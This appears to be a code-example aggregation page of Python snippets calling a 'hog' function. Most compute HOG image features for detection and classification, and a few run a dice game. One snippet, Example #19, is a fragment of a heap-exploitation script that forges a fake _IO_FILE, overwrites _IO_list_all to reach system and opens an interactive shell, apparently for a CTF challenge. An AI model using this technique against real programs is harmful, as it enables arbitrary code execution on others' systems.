Example #1
0
def main():
    classifier = hog.load_classifier(filename)

    pos = [
        hog.hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(pos_path, image), 0),
                           (width, height)))) for image in os.listdir(pos_path)
    ]
    neg = [
        hog.hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(neg_path, image), 0),
                           (width, height)))) for image in os.listdir(neg_path)
    ]
    x_test = pos + neg
    y_test = [1] * len(pos) + [0] * len(neg)
    accuracy = classifier.score(x_test, y_test)
    print("Dokładność")
    print(accuracy * 100)
    positive = classifier.predict(pos)
    negative = classifier.predict(neg)
    print("Czułość")
    print(numpy.mean(positive) * 100)
    print("Swoistość")
    print((1 - numpy.mean(negative)) * 100)
def _sliding_window(image,
                    model,
                    scale,
                    hog_options=HOGOptions(),
                    detection_options=DetectionOptions()):
    '''A sliding window worker method to find faces using image pyramid scales.
    Args:
        image (list): A black and white list represented image to be scanned.
        model (LinearSVM): An sklearn linear svm model with proba trained with hog data.
        hog_options (HOGOptions): Defaults to HOGOptions().
        detection_options (DetectionOptions): Defaults to DetectionOptions().
        scale (double): Scale of the image.
    Returns:
        found_faces (list): All suspected faces.
    '''
    found_faces = list()
    # If these specific conditions are met then sliding window will not work
    if scale == 1 and image.shape == hog_options.window_size:
        window_hog = hog(image, options=hog_options)
        model_probability = model.predict_proba([window_hog])[:, 1][0]
        if model_probability >= detection_options.accept_threshold:
            found_faces.append(
                Face((0, 0), (image.shape[0] - 1, image.shape[1] - 1),
                     model_probability))
            return found_faces
    # Rescale the image to form an image pyramid.
    rescaled_image = rescale(image, 1 / scale, mode='reflect')
    # Calculate overlap pixel size from dimension average.
    overlap_amount = int(
        sum(rescaled_image.shape) * 0.5 * detection_options.overlap_percentage)
    # Go through the vertical and horizontal pixels to form a sliding window.
    for row_start in range(
            0, rescaled_image.shape[0] - hog_options.window_size[0],
            overlap_amount):
        for column_start in range(
                0, rescaled_image.shape[1] - hog_options.window_size[1],
                overlap_amount):
            row_end = row_start + hog_options.window_size[0]
            column_end = column_start + hog_options.window_size[1]
            # Crop the desired window from the image.
            window = rescaled_image[row_start:row_end, column_start:column_end]
            # Calculate the Histogram of Orientate Gradients for the desired window.
            window_hog = hog(window, options=hog_options)
            # Calculate the probability of the window containing a face.
            model_probability = model.predict_proba([window_hog])[:, 1][0]
            if model_probability >= detection_options.accept_threshold:
                # Scale the window coordinates to the full size image
                found_faces.append(
                    Face((int(row_start * scale), int(column_start * scale)),
                         (int(row_end * scale), int(column_end * scale)),
                         model_probability))
    return found_faces
Example #3
0
    def __init__(self, parent, computer=False):
        """Replace hog module's dice with hooks to GUI and start a game.
        parent   -- parent widget (should be root)
        computer -- True if playing against a computer
        """

        D = 20
        N = 100
        self.h = hog(D, N)

        self.STRATEGIES = [
            self.h.strategie_aveugle(),
            self.h.strategie_toujour_lancer(3)
        ]

        super().__init__(parent)
        self.pack(fill=BOTH)
        self.parent = parent
        self.who = 0

        self.init_scores()
        self.strs()
        self.init_rolls()
        self.init_dice()
        self.init_status()
        self.init_restart()

        six_sided = self.make_dice()
        self.computer, self.turn = computer, 0
        self.play()
Example #4
0
def get_box(rgb):
    rgb = color.rgb2gray(rgb)
    rgb = transform.rescale(rgb, 0.5)    

    model = joblib.load('../train/svm_training_data.dat')

    indices, patches = zip(*sliding_window(rgb))
    patches_hog = np.array([hog.hog(patch) for patch in patches])

    labels = model.predict(patches_hog)

    Ni, Nj = 64, 48
    indices = np.array(indices)

    boxesList = []
    
    for (i, j) in indices[labels == 1]:
        boxesList.append((j, i, j+Nj, i+Ni))

    boxesList = np.array(boxesList)
    pick = non_max_suppression_slow(boxesList, 0.3)

    if len(pick) == 0:
        return []
        
    return [(pick[0][1], pick[0][2], pick[0][3], pick[0][0])]
Example #5
0
    def get_scale_sample(self, im, scaleFactors):
        """
        Extract a sample fro the scale filter at the current location and scale
        :param im:
        :return:
        """
        import cv2
        from hog import hog
        resized_im_array = np.zeros(
            (len(self.scaleFactors),
             int(
                 np.floor(self.first_target_sz[0] / 4) *
                 np.floor(self.first_target_sz[1] / 4) * 31)))
        for i, s in enumerate(scaleFactors):
            patch_sz = np.floor(self.first_target_sz * s)
            im_patch = self.get_subwindow(im, self.pos,
                                          patch_sz)  # extract image
            im_patch_resized = imresize(
                im_patch, self.first_target_sz)  #resize image to model size
            img_gray = cv2.cvtColor(im_patch_resized, cv2.COLOR_BGR2GRAY)
            features_hog, hog_image = hog(img_gray,
                                          orientations=31,
                                          pixels_per_cell=(4, 4),
                                          cells_per_block=(1, 1))
            resized_im_array[i, :] = np.multiply(features_hog.flatten(),
                                                 self.scale_window[i])

        return resized_im_array
Example #6
0
def get_hog(dir_path):
    histograms = [
        hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(dir_path, image)),
                           (width, height)))) for image in os.listdir(dir_path)
    ]
    return histograms
Example #7
0
    def setupUi(self, Frame,joueur=1):
        D = 10
        N = 100
        self.h = hog(D,N)
        
        self.result = lp_resolution(self.h.probabiltes,D,joueur)
        
        Frame.setObjectName("Frame")
        Frame.resize(750, 247)
        self.gridLayout_2 = QtWidgets.QGridLayout(Frame)
        self.gridLayout_2.setObjectName("gridLayout_2")
        self.gridLayout = QtWidgets.QGridLayout()
        self.gridLayout.setObjectName("gridLayout")
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName("verticalLayout")
        self.Text = QtWidgets.QLabel(Frame)
        self.Text.setObjectName("Text")
        self.verticalLayout.addWidget(self.Text)
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.entry_d1 = QtWidgets.QSpinBox(Frame)
        self.entry_d1.setMinimum(1)
        self.entry_d1.setObjectName("entry_d1")
        self.horizontalLayout.addWidget(self.entry_d1)
        self.button_lancer = QtWidgets.QPushButton(Frame)
        self.button_lancer.setObjectName("button_lancer")
        self.horizontalLayout.addWidget(self.button_lancer)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        self.d1_aff = QtWidgets.QLabel(Frame)
        self.d1_aff.setObjectName("d1_aff")
        self.horizontalLayout_2.addWidget(self.d1_aff)
        self.d2_aff = QtWidgets.QLabel(Frame)
        self.d2_aff.setObjectName("d2_aff")
        self.horizontalLayout_2.addWidget(self.d2_aff)
        self.gridLayout.addLayout(self.horizontalLayout_2, 1, 0, 1, 1)
        self.ganeur_aff = QtWidgets.QLabel(Frame)
        self.ganeur_aff.setObjectName("ganeur_aff")
        self.gridLayout.addWidget(self.ganeur_aff, 3, 0, 1, 1)
        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_3.setObjectName("horizontalLayout_3")
        self.score1_aff = QtWidgets.QLabel(Frame)
        self.score1_aff.setObjectName("score1_aff")
        self.horizontalLayout_3.addWidget(self.score1_aff)
        self.score2_aff = QtWidgets.QLabel(Frame)
        self.score2_aff.setObjectName("score2_aff")
        self.horizontalLayout_3.addWidget(self.score2_aff)
        self.gridLayout.addLayout(self.horizontalLayout_3, 2, 0, 1, 1)
        self.gridLayout_2.addLayout(self.gridLayout, 1, 0, 1, 1)
        self.Nom = QtWidgets.QLabel(Frame)
        self.Nom.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
        self.Nom.setObjectName("Nom")
        self.gridLayout_2.addWidget(self.Nom, 0, 0, 1, 1)

        self.retranslateUi(Frame)
        QtCore.QMetaObject.connectSlotsByName(Frame)
Example #8
0
def main():
    pos = [
        hog(numpy.float32(cv2.imread(os.path.join(pos_path, image), 0)))
        for image in os.listdir(pos_path)
    ]
    neg = [
        hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(neg_path, image), 0),
                           (width, height)))) for image in os.listdir(neg_path)
    ]

    x = pos + neg
    y = [1] * len(pos) + [0] * len(neg)
    data_frame = numpy.c_[x, y]
    numpy.random.shuffle(data_frame)
    svc = train_classifier(data_frame[:, :-1], data_frame[:, -1])
    save_classifier(svc, filename)
    print('Zakończono uczenie, klasyfikator zapisany do pliku svc.pkl')
Example #9
0
def hog2(im):
    if not isinstance(im, Image.Image):
        im = Image.open(im)
    im = im.resize((100, 100), Image.ANTIALIAS).convert('RGB')
    im.save('a.jpg')
    F = hog('a.jpg')
    feat_list = []
    for fs in F:
        for f in fs:
            feat_list.append(list(f))
    return feat_list
Example #10
0
def hog2(im):
    if not isinstance(im, Image.Image):
        im = Image.open(im)
    im = im.resize((100, 100), Image.ANTIALIAS).convert('RGB')
    im.save('a.jpg')
    F = hog('a.jpg')
    feat_list = []
    for fs in F:
        for f in fs:
            feat_list.append(list(f))
    return feat_list
Example #11
0
def main():
    classifier = hog.load_classifier(filename)
    image_name = input("Podaj nazwę pliku ze zdjęciem:")
    img = cv2.imread(image_name, 0)
    img = cv2.resize(img, (width, height))
    img = numpy.float32(img)
    histogram = numpy.asarray(hog.hog(img)).reshape(1, -1)
    y = hog.predict(classifier, histogram)
    if y == 1:
        print("Na zdjęciu znajduje się człowiek")
    elif y == 0:
        print("Na zdjęciu nie znajduje się człowiek")
Example #12
0
def hog3(im):
    if not isinstance(im, Image.Image):
        im = Image.open(im)
    im = im.resize((100, 100), Image.ANTIALIAS).convert('RGB')
    im.save('a.jpg')
    F = hog('a.jpg')
    feat_list = []
    for i, fs in enumerate(F):
        if i % 2 == 1: continue
        for j, f in enumerate(fs):
            if j % 2 == 1: continue
            feat_list.append(list(f))
    return feat_list
Example #13
0
def hog3(im):
    if not isinstance(im, Image.Image):
        im = Image.open(im)
    im = im.resize((100, 100), Image.ANTIALIAS).convert('RGB')
    im.save('a.jpg')
    F = hog('a.jpg')
    feat_list = []
    for i, fs in enumerate(F):
        if i % 2 == 1: continue
        for j, f in enumerate(fs):
            if j % 2 == 1: continue
            feat_list.append(list(f))
    return feat_list
Example #14
0
def generateHOG(input_dir, output_dir, pixels_per_cell, cells_per_block, v, n):
	filename =input_dir

	# convert to grayimage 
	img = Image.open(filename).convert('L').resize((514,514))
	#arr = rgb2gray(array(img))
	arr = array(img)
	#print arr.shape

	(hogarray, hogimg) = hog(arr, pixels_per_cell=pixels_per_cell, cells_per_block=cells_per_block,visualise=v, normalise=n)
	#print hogimg.shape
	img = Image.fromarray(hogimg);
	img.show()
def hog_feature_vec(img):
    h, w = np.shape(img)

    m = h // 4
    n = w // 4

    feature_vec = []
    for i in range(0, h, m):
        for j in range(0, w, n):
            # hog_vector = hog_vec(img, i, j, m, n)
            hog_vec = hog.hog(img, i, j, m, n)
            feature_vec += hog_vec
    return np.array(feature_vec)
def generate_hog_data(image, hog_options=HOGOptions()):
    '''Generate Histogram of Oriented Gradients features from given image.
    Args:
        image (numpy.array): Image to calculate features from as a numpy array.
        hog_options (HOGOptions, optional): Defaults to HOGOptions(). Configuration for HOG
                                            algorithm.
    Returns:
        hog_image (numpy.array): Features of HOG data extracted from image.
    '''
    # Check if image is correctly sized, if not resize. This may cause images to be distorted
    # and is not prefered.
    if image.shape != hog_options.window_size:
        print('Resizing this could potentially lead to bad data')
        image = resize(image, hog_options.window_size)
    # Calculate the Histogram of Orientate Gradients for the desired window with defaults.
    hog_image = hog(image, options=hog_options)
    return hog_image
Example #17
0
def get_features(train=True):
    if train:
        # Load cifar10 train data and labels
        print("Reading training data...")
        x_data, y_data = cifar10(config.path_to_cifar, "train")
    else:
        print("Reading testing data...")
        x_data, y_data = cifar10(config.path_to_cifar, "test")

    N_data = len(x_data)

    assert x_data.shape[0] == len(
        y_data) and "Both data and labels should be the same set size"

    print("Num of training samples: ", N_data)
    x_data = np.array([cv2.cvtColor(x, cv2.COLOR_RGB2GRAY) for x in x_data],
                      dtype=np.float32)
    x_data /= 255.

    # Extract features
    print("Extracting HOG Features, go grab a coffee...", end=" ")
    with Timer(verbose=False) as t:
        x_data = hog(x_data)
    print("HoG extraction for train set took {} mins".format(t.mins))

    if config.min_max_norm:
        #Normalize the HOG feature vectors by rescaling the value range to [-1, 1]
        print(
            "Normalize the HOG features by rescaling the value range to [-1, 1]"
        )
        scaler = MinMaxScaler(feature_range=(-1, 1)).fit(x_data)
        x_data = scaler.fit_transform(x_data)
    elif config.unit_vector_norm:
        #Normalize the HOG feature vectors by converting them to unit vectors (vector has length of 1)
        print("Normalize the HOG features by converting them to unit vectors")
        x_data = x_data / np.linalg.norm(x_data)

    if train:
        #Randomly shuffle the data if training.
        rand_idx = np.arange(N_data)
        np.random.shuffle(rand_idx)
        x_data = x_data[rand_idx]
        y_data = y_data[rand_idx]

    return x_data, y_data
Example #18
0
    def AngMag(self, tracks, return_df=True, ho_bins=8):
        # tracks = np.array([[[100,0],[0,0],[10,10],[100,100]],[[0,0],[30,50],[5,10],[10,100]]])
        # tracks = np.array([[[0,100],[0,0],[0,0],[0,0]],[[30,200],[30,50],[0,0],[0,0]]])
        tracks = np.array([[[50, 50], [60, 50], [65, 55], [65, 65], [60, 70],
                            [50, 70], [45, 65], [45, 55], [50, 50]]])
        angles = np.full((tracks.shape[0], tracks.shape[1]), 0)
        mags = np.copy(angles)
        # print(tracks)
        # print(tracks.shape)
        hogs = np.full((tracks.shape[1], ho_bins), np.nan)
        # print(hogs.dtype)
        # nr_row = nr of track
        # nr_col = pos of track
        for nr_row in range(tracks.shape[1] - 1):
            for nr_col in range(tracks.shape[0]):
                a = tracks[nr_col, nr_row]
                b = tracks[nr_col][nr_row + 1]
                if a.any() != 0 and b.any() != 0:
                    angle = get_Angle(a, b)
                    angles[nr_col, nr_row + 1] = angle
                    mag = np.linalg.norm(np.array(a) - np.array(b))
                    mags[nr_col, nr_row + 1] = mag
            hogs[nr_row] = hog.hog(angles[:, nr_row], mags[:, nr_row], ho_bins)

        hogs = hogs[1:]
        print('hogsende: ')
        hog_norm = cv.normalize(hogs,
                                None,
                                alpha=0,
                                beta=255,
                                norm_type=cv.NORM_MINMAX,
                                dtype=cv.CV_8U).transpose(1, 0)
        hogshow = cv.applyColorMap(hog_norm, cv.COLORMAP_SUMMER)

        cv.imwrite('directions.png', hogshow)
        return hogshow
Example #19
0
###LEAK heap_addr
upgrade_house(1000,'a' * 16, 10, 1)
see_the_house()

p.recvuntil('a' * 16)
old_top_addr = u64(p.recv(6).ljust(8,'\x00'))
log.info('old_top_addr : ' + hex(old_top_addr))
################

###unsorted bin attack && write fake _IO_FILE
start =  old_top_addr + 0x450 + 8 * 6
log.info('fake struct start : ' + hex(start))

payload = 'a' * 0x450

payload += p64(0) ## next chunk : prev_size
payload += p64(33) ## next chunk : size
payload += p64(0x1f0000000a) ##next chunk : content
payload += p64(0) ##next chunk : content

payload += hog(libc+ l.sym['_IO_list_all'], start, libc + l.sym['system'])

upgrade_house(0x1000,payload,10,1)
#####################

pause()
p.sendlineafter('Your choice : ', '1') ## triger malloc()

p.interactive()
Example #20
0

negative_patches = np.vstack([
    extract_patches(im, 1000, scale) for im in images
    for scale in [0.5, 1.0, 2.0]
])

# negative_patches = np.vstack([extract_patches(im, 1, scale)
#                               for im in images for scale in [0.5, 1.0, 2.0]])

print('negative_patches retrieved')
getCurrTime()
print('Extracting HOG features')

X_train = np.array(
    [hog.hog(im) for im in chain(positive_patches, negative_patches)])

# X_train = np.array([hog.hog(im)
#                     for im in positive_patches])

y_train = np.zeros(X_train.shape[0])
y_train[:positive_patches.shape[0]] = 1

print('HOG features extracted')
getCurrTime()
print('Finding best estimator')

grid = GridSearchCV(LinearSVC(), {'C': [1.0, 2.0, 4.0, 8.0]})
grid.fit(X_train, y_train)

print('Found best estimator')
Example #21
0
        lst = map(string.atoi, line.strip('\n').split(','))
        y.append(lst[0])
        x.append(lst[1:])
        image = []
        for i in range(28):
            i1 = 1 + i * 28
            i2 = 1 + (i + 1) * 28
            l = lst[i1:i2]
            image.append(l)
        m.append(image)
#f=hierarchical_features(m,4,2)
#'''
x_hog = []
for image in m:
    #print hog.hog(image)
    x_hog.append(hog.hog(image))
for i in range(10):
    print x_hog[i]
x_hog = array(x_hog)
#'''
#clf=ensemble.RandomForestClassifier(n_estimators=100)
#clf=svm.SVC()
clf = svm.SVC(kernel='poly', degree=2, coef0=1)
#clf=linear_model.LogisticRegression(C=0.1,penalty='l1')
#clf=linear_model.SGDClassifier(loss="hinge", penalty="l2")
x = array(x)
y = array(y)
#f=array(f)
'''
z=[]
num=0
Example #22
0
def launch_learning(x):
    """
    Funkcja pobiera macierz przykladow zapisanych w macierzy X o wymiarach NxD i zwraca wektor y o wymiarach Nx1,
    gdzie kazdy element jest z zakresu {0, ..., 35} i oznacza znak rozpoznany na danym przykladzie.
    :param x: macierz o wymiarach NxD
    :return: wektor o wymiarach Nx1
    """
    x_train, y_train = load_training_data()

    x_train = prepare_x(x_train)
    y_train = prepare_y(y_train)
    x = prepare_x(x)

    hog_for_shape = hog.hog(x_train[0],
                            cell_size=(HOG_CELL_SIZE, HOG_CELL_SIZE),
                            cells_per_block=(HOG_CELL_BLOCK, HOG_CELL_BLOCK),
                            signed_orientation=False,
                            nbins=HOG_NBINS,
                            visualise=False,
                            normalise=True,
                            flatten=True,
                            same_size=True)

    with open(TRAIN_HOG_FILE_PATH, 'rb') as f:
        features_train = pkl.load(f)

    print('features_train after load:{}'.format(features_train))
    print('features_train after load shape:{}'.format(features_train.shape))

    if features_train.shape != (x_train.shape[0], hog_for_shape.shape[0]):
        features_train = np.empty(shape=(x_train.shape[0],
                                         hog_for_shape.shape[0]))
        print('Need to recompute features for training set')
        for i in range(x_train.shape[0]):
            features_train[i] = hog.hog(x_train[i],
                                        cell_size=(HOG_CELL_SIZE,
                                                   HOG_CELL_SIZE),
                                        cells_per_block=(HOG_CELL_BLOCK,
                                                         HOG_CELL_BLOCK),
                                        signed_orientation=False,
                                        nbins=HOG_NBINS,
                                        visualise=False,
                                        normalise=True,
                                        flatten=True,
                                        same_size=True)

        with open(TRAIN_HOG_FILE_PATH, 'wb') as pickle_file:
            pkl.dump(features_train, pickle_file)

    # those lines are neccesary in upload version, above code will disappear however
    # features_x = np.empty(shape=(x.shape[0], hog_for_shape.shape[0]))
    #         for i in range(x.shape[0]):
    #                 features_x[i] = hog.hog(x[i], cell_size=(HOG_CELL_SIZE, HOG_CELL_SIZE),
    #                             cells_per_block=(HOG_CELL_BLOCK, HOG_CELL_BLOCK),
    #                             signed_orientation=False, nbins=HOG_NBINS, visualise=False,
    #                             normalise=True, flatten=True, same_size=True)

    input_layer_neurons = features_train.shape[1]
    hidden_layer_neurons = NN_HIDDEN_NEURONS
    output_neurons = NUMBER_OF_LABELS
    needs_init = False
    try:
        with open(WEIGHTS_HIDDEN_PATH, 'rb') as f:
            weights_hidden = pkl.load(f)
        with open(BIASES_HIDDEN_PATH, 'rb') as f:
            biases_hidden = pkl.load(f)
        with open(WEIGHTS_OUTPUT_PATH, 'rb') as f:
            weights_output = pkl.load(f)
        with open(BIASES_OUTPUT_PATH, 'rb') as f:
            biases_output = pkl.load(f)
    except EOFError:
        needs_init = True

    if needs_init or weights_hidden.shape != (input_layer_neurons,
                                              hidden_layer_neurons):
        print('starting learning')

        # all connections from every feature to every node in hidden layer
        weights_hidden = np.random.uniform(size=(input_layer_neurons,
                                                 hidden_layer_neurons))
        biases_hidden = np.random.uniform(size=(1, hidden_layer_neurons))

        # all connections from every hidden_neuron to output neuron
        weights_output = np.random.uniform(size=(hidden_layer_neurons,
                                                 output_neurons))
        biases_output = np.random.uniform(size=(1, output_neurons))

    for i in range(epochs):
        print('weights hidden:{} {} {}'.format(weights_hidden[0][1],
                                               weights_hidden[0][2],
                                               weights_hidden[0][3]))
        # if using batches it will go here
        hidden_ins_w = np.dot(features_train, weights_hidden)
        hidden_layer_input = hidden_ins_w + biases_hidden
        hidden_activations = nn.sigmoid(hidden_layer_input)

        output_hidden_ins_w = np.dot(hidden_activations, weights_output)
        output_layer_input = output_hidden_ins_w + biases_output
        output = nn.sigmoid(output_layer_input)

        # back propagation
        print('starting back propagation:{}'.format(i))
        error = calc_error(output, y_train)
        slope_output_layer = nn.sigmoid_derivative(output)
        slope_hidden_layer = nn.sigmoid_derivative(hidden_activations)

        delta_output = slope_output_layer * error

        error_hidden = delta_output.dot(weights_output.T)
        delta_hidden_layer = error_hidden * slope_hidden_layer

        weights_output += hidden_activations.T.dot(
            delta_output) * LEARNING_RATE
        biases_output += np.sum(delta_output, axis=0,
                                keepdims=True) * LEARNING_RATE

        weights_hidden += features_train.T.dot(
            delta_hidden_layer) * LEARNING_RATE
        biases_hidden += np.sum(delta_hidden_layer, axis=0,
                                keepdims=True) * LEARNING_RATE

        with open(WEIGHTS_HIDDEN_PATH, 'wb') as f:
            pkl.dump(weights_hidden, f)
        with open(BIASES_HIDDEN_PATH, 'wb') as f:
            pkl.dump(biases_hidden, f)
        with open(WEIGHTS_OUTPUT_PATH, 'wb') as f:
            pkl.dump(weights_output, f)
        with open(BIASES_OUTPUT_PATH, 'wb') as f:
            pkl.dump(biases_output, f)

    return 1
    pass
 def compute_features(self, x):
     x = x.reshape(28, 28)
     return np.concatenate((hog(x, 4, num_bins=12), hog(x, 7, num_bins=12), hog(x, 14, num_bins=12)))
def append_data_hog (X, Y, img, class_name):
    hogdata = hog.hog (np.float32 (img) / 255.0)

    X.append (np.float32 (hogdata))
    Y.append (np.array ([classes.index (class_name)]).astype (np.int32))
Example #25
0
        if (dir != DATA_DIR):
            for file in files:
                label = dir.split("/")[1]

                if (label == 'cat'):
                    label = 1
                else:
                    label = -1

                labels.append(label)

                abs_path = dir + "/" + file
                print("[INFO] Reading file : " + abs_path)

                img = cv2.imread(abs_path)
                hog_emb, grad_magnitude = hog(img)

                hog_embeddings.append(hog_emb)

    print("-----------------------------------------------------------")
    print("[INFO] Implementing Principal component analysis ... ")
    hog_embeddings = np.array(hog_embeddings)

    labels = np.array(labels)
    hog_embeddings = pca.fit_transform(hog_embeddings)

    pickle.dump(hog_embeddings, open("hog_embeddings.pickle", "wb"))
    pickle.dump(labels, open("labels.pickle", "wb"))
else:
    hog_embeddings = pickle.load(open("hog_embeddings.pickle", "rb"))
    labels = pickle.load(open("labels.pickle", "rb"))
Example #26
0
parser.add_argument("-i", "--image", help="test image", required=True)
parser.add_argument(
    "-p",
    "--pedestrian",
    help=
    "a pedestrian is present - add this tag if the image contains a pedestrian and omit the tag if it does not",
    action="store_true")
parser.add_argument("-w",
                    "--weights",
                    help="input file for weights (pickled)",
                    required=True)

args = parser.parse_args()

# Load image, get HOG
whole_hog = hog.hog(Image.open(args.image))
weights = None

# Open weights
with open(args.weights, 'rb') as f:
    weights = pickle.load(f)

# Use perceptron
result = perceptron.test(whole_hog, weights)

if result == args.pedestrian:
    print("Success")
else:
    print("Failure")

exit(0 if result == args.pedestrian else 1)
Example #27
0
def main():
    # read the image and make it gray
    ap = argparse.ArgumentParser()
    ap.add_argument("-i", "--image", required=True, help="Path to the image")
    args = vars(ap.parse_args())

    image = cv2.imread(args["image"])
    height, width, channel = image.shape
    img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

    # execute LBP
    img_lbp = np.zeros((height, width, 3), np.uint8)
    for i in range(0, height):
        for j in range(0, width):
            img_lbp[i, j] = lbp(img_gray, i, j)
    hist_lbp = cv2.calcHist([img_lbp], [0], None, [256], [0, 256])
    output_list = []
    output_list.append({
        "img": img_gray,
        "xlabel": "",
        "ylabel": "",
        "xtick": [],
        "ytick": [],
        "title": "Gray Image",
        "type": "gray"
    })
    output_list.append({
        "img": img_lbp,
        "xlabel": "",
        "ylabel": "",
        "xtick": [],
        "ytick": [],
        "title": "LBP Image",
        "type": "gray"
    })
    output_list.append({
        "img": hist_lbp,
        "xlabel": "Bins",
        "ylabel": "Number of pixels",
        "xtick": None,
        "ytick": None,
        "title": "Histogram(LBP)",
        "type": "histogram"
    })

    # execute HOG
    horizontal_mask = np.array([-1, 0, -1])
    vertical_mask = np.array([[-1], [0], [1]])

    horizontal_grad = hog.calculate_gradient(img_gray, horizontal_mask)
    vertical_grad = hog.calculate_gradient(img_gray, vertical_mask)

    grad_magnitude = hog.gradient_magnitude(horizontal_grad, vertical_grad)
    grad_direction = hog.gradient_direction(horizontal_grad, vertical_grad)

    grad_direction = grad_direction % 180
    hist_bins = np.array([10, 30, 50, 70, 90, 110, 130, 150, 170])

    # histogram of the first cell in the first block
    cell_direction = grad_direction[:8, :8]
    cell_magnitude = grad_magnitude[:8, :8]
    HOG_cell_hist = hog.hog(cell_direction, cell_magnitude, hist_bins)

    # show output of descriptors
    show_output(output_list)

    plt.bar(x=np.arange(9), height=HOG_cell_hist, align="center", width=0.8)
    plt.show()

    cv2.waitKey(0)
    cv2.destroyAllWindows()
Example #28
0
		lst=map(string.atoi,line.strip('\n').split(','))
		y.append(lst[0])
		x.append(lst[1:])
		image=[]
		for i in range(28):
			i1=1+i*28
			i2=1+(i+1)*28
			l=lst[i1:i2]
			image.append(l)
		m.append(image)
#f=hierarchical_features(m,4,2)
#'''
x_hog=[]
for image in m:
	#print hog.hog(image)
	x_hog.append(hog.hog(image))
for i in range(10):
	print x_hog[i]
x_hog=array(x_hog)
#'''
#clf=ensemble.RandomForestClassifier(n_estimators=100)
#clf=svm.SVC()
clf=svm.SVC(kernel='poly',degree=2,coef0=1)
#clf=linear_model.LogisticRegression(C=0.1,penalty='l1')
#clf=linear_model.SGDClassifier(loss="hinge", penalty="l2")
x=array(x)
y=array(y)
#f=array(f)
'''
z=[]
num=0
Example #29
0
"""
Ce fichier contient le fonction que on a utiliser pour l'expérimentation des differentes strategies.
"""

from outils import *
from hog import hog
import numpy as np

D = 20
N = 100
h = hog(D, N)


def moyenne(strategie1, strategie2, name1, name2, steps=1000):
    def f1():
        score1, score2 = h.jouer(strategie1, strategie2)
        return 0 if score1 > score2 else 1

    def f2():
        score1, score2 = h.jouer(strategie1, strategie2)
        return 0 if score1 > score2 else 1

    a = np.zeros((steps)) - 1
    vfunc = np.vectorize(lambda x: f1())
    s1 = 1 - vfunc(a).sum() / steps

    r = dict()
    t = dict()
    t[name2] = s1
    r[name1] = t
Example #30
0
data = []

# Read files
fcount = len(os.listdir(args.positive_dir)) + len(os.listdir(args.negative_dir))

try:
    with open('tmpfile', 'rb') as f:
        data = pickle.load(f)
        debug_print("Restarting interrupted training (remove tmpfile to start from stratch)")
except:
    debug_print("Reading data (%d files)" % fcount)

    n = 0
    pc = 0
    for f in os.scandir(args.positive_dir):
        data.append((hog.hog(Image.open(f.path)), 1))
        n += 1
        if n >= fcount / 10:
            n = 0
            pc += 10
            debug_print("%d%% read" % pc)

    for f in os.scandir(args.negative_dir):
        data.append((hog.hog(Image.open(f.path)), -1))
        n += 1
        if n >= fcount / 10:
            n = 0
            pc += 10
            debug_print("%d%% read" % pc)

debug_print("Done reading data")
Example #31
0
    hog_v2 = []
    target = []
    clf = None
    # '''
    # Positive Training
    pos = 0
    for files in folder_pos[0 + pos_file_num / classifiers *
                            i:(pos_file_num + pos_file_num * i) / classifiers]:
        pos += 1
        im = io.imread(files)
        im = color.rgb2gray(im)
        h, w = im.shape

        hog_v1 = hog.hog(im,
                         orientations=9,
                         pixels_per_cell=(6, 6),
                         cells_per_block=(3, 3),
                         visualise=False,
                         normalise=True)
        hog_v.append(hog_v1)
        target.append(1)
        if (pos % 100 == 0):
            print("Positive Training ", i + 1, ", Progress status - ",
                  pos * 100 / (pos_file_num / 3), "%")

    # Negative Training
    neg = 0

    for files in folder_neg[0 + neg_file_num / classifiers *
                            i:(neg_file_num + neg_file_num * i) / classifiers]:
        neg += 1
        im = io.imread(files)
 def run(self, im):
     if self.padding:
         return hog.hogpad(hog.hog(im, self.binsize))
     else:
         return hog.hog(im, self.binsize)